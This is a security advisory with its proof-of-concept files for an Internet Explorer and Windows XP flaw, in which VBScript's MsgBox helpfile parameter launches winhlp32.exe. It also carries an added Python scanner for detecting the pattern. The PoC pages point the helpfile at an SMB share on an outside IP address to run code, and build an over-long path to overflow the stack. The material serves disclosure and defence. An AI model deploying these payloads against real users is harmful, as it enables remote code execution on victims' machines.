------------------isec-0027-msgbox-helpfile-ie.txt------------
===[ ABSTRACT ]=========================================================
It is possible to invoke winhlp32.exe from Internet Explorer 8, 7 and 6 using VBScript. Passing a malicious .HLP file to winhlp32 could allow a remote attacker to run an arbitrary command. Additionally, there is a stack overflow vulnerability in winhlp32.exe.
===[ AFFECTED SOFTWARE ]================================================
Windows XP SP3
NOT AFFECTED: Vista, Windows 7
===[ DESCRIPTION ]======================================================
To trigger the vulnerability some user interaction is needed: the victim has to press F1 while the MsgBox popup is displayed.
Syntax of MsgBox function:
MsgBox(prompt[,buttons][,title][,helpfile,context])
It is possible to pass a remote Samba (SMB) share as the helpfile parameter. In addition, there is a stack-based buffer overflow when the helpfile parameter is too long. However, on XP winhlp32.exe is compiled with the /GS flag, which in this case effectively guards the stack.
Proof-of-Concept is available here: http://isec.pl/poc-isec27/
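As an added defender-side example (not part of the advisory or its PoC), the following Python scans fetched HTML for VBScript MsgBox calls whose fourth (helpfile) argument is a UNC path to a remote share, a value built at runtime, or an over-long literal, which are the three shapes the advisory describes. The sample page, the detection reasons and the 260-character threshold are my own constructions.

```python
import re

# Constructed sample shaped like the advisory's box.html (not the real file).
SAMPLE = r'''<html><script type="text/vbscript">
big = "\\192.0.2.10\PUBLIC\test.hlp"
MsgBox "please press F1 to save the world", ,"please save the world", big, 1
MsgBox "press F1 to close this popup", ,"", "\\192.0.2.10\PUBLIC\test.hlp", 1
</script></html>'''
VBS_BLOCK = re.compile(r'<script[^>]*text/vbscript[^>]*>(.*?)</script>', re.I | re.S)
# MsgBox as a statement or a function call; group 1 is the raw argument list.
MSGBOX = re.compile(r'^\s*(?:Call\s+)?MsgBox\b\s*\(?(.*?)\)?\s*$', re.I)

def split_args(text):
    """Split a VBScript argument list on commas outside double quotes; stop at a ' comment."""
    args, cur, in_str = [], '', False
    for ch in text:
        if ch == '"':
            in_str = not in_str
        if ch == "'" and not in_str:
            break
        if ch == ',' and not in_str:
            args.append(cur.strip())
            cur = ''
        else:
            cur += ch
    args.append(cur.strip())
    return args

def classify_helpfile(arg):
    """Reason string if the 4th MsgBox argument (helpfile) looks risky, else None."""
    if re.match(r'^"\\\\[^"]+"$', arg):
        return 'helpfile is a UNC path (remote share)'
    if not (arg.startswith('"') and arg.endswith('"')):
        return 'helpfile is built at runtime (non-literal)'
    if len(arg) > 260:  # MAX_PATH; the threshold is my own choice
        return 'helpfile literal exceeds MAX_PATH'
    return None

def scan_html(html):
    """Return [(source line, reason)] for MsgBox calls that pass a suspicious helpfile."""
    findings = []
    for block in VBS_BLOCK.findall(html):
        for line in block.splitlines():
            m = MSGBOX.match(line)
            if not m:
                continue
            args = split_args(m.group(1))  # prompt, buttons, title, helpfile[, context]
            reason = classify_helpfile(args[3]) if len(args) >= 4 else None
            if reason:
                findings.append((line.strip(), reason))
    return findings
```

Because the overflow PoC builds its path with a loop, the scanner cannot see the final length statically; flagging any non-literal helpfile argument is what catches that case.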
===[ IMPACT ]===========================================================
Score: MEDIUM
The vulnerability allows a remote attacker to run arbitrary code on the victim's machine.
===[ DISCLOSURE TIMELINE ]==============================================
01 Feb 2007  The vulnerability was discovered.
26 Feb 2010  Public disclosure
===[ AUTHOR ]===========================================================
Maurycy Prodeus | twitter.com/mprodeus
-------------------------------------------poc-isec27.html-----------------------------------
<html>
<title>IE8, IE7 XP MsgBox PoC</title>
<body>
<script>
if(navigator.userAgent.indexOf('MSIE') < 0)
  document.write('<b>Warn: Your browser isn\'t IE? It won\'t work.</b>');
</script>
<br><br>
This is a simple demo for the IE8/IE7 (WinXP only) vulnerability described here:<br>
<a href="http://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt">http://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt</a>
<br><br><br>
[+] The first one should spawn calc.exe after pressing F1. <br>
<FORM>
<INPUT TYPE="BUTTON" VALUE="Calc.exe" ONCLICK="window.location.href='box.html'">
</FORM>
<br><br>
[+] The second one triggers a stack overflow in the winhlp32 process. <br>
<FORM>
<INPUT TYPE="BUTTON" VALUE="Stack Overflow" ONCLICK="window.location.href='box2.html'">
</FORM>
<br><br>
iSEC 2010 (C) <a href="http://twitter.com/mprodeus">maurycy prodeus</a>
</body>
</html>
-----------------------------------box2.html----------------------------
<html>
<script type="text/vbscript">
' build an over-long helpfile path (4 + 4500*4 characters) to hit the winhlp32 stack overflow
big = "aaaa"
For i=1 to 4500
  big = big & "\..\"
Next
MsgBox "please press F1 to save the world", ,"please save the world", big, 1
</script>
</html>
------------------------box.html-----------------------------------
<html>
<script type="text/vbscript">
' helpfile argument pointing at a remote SMB share (the advisory's PoC host)
big = "\\184.73.14.110\PUBLIC\test.hlp"
' the length padding is disabled in this variant (VBScript comments use an apostrophe, not //)
'For i=1 to 2500
'  big = big & "\..\"
'Next
MsgBox "please press F1 to save the world", ,"please save the world", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
</script>
</html>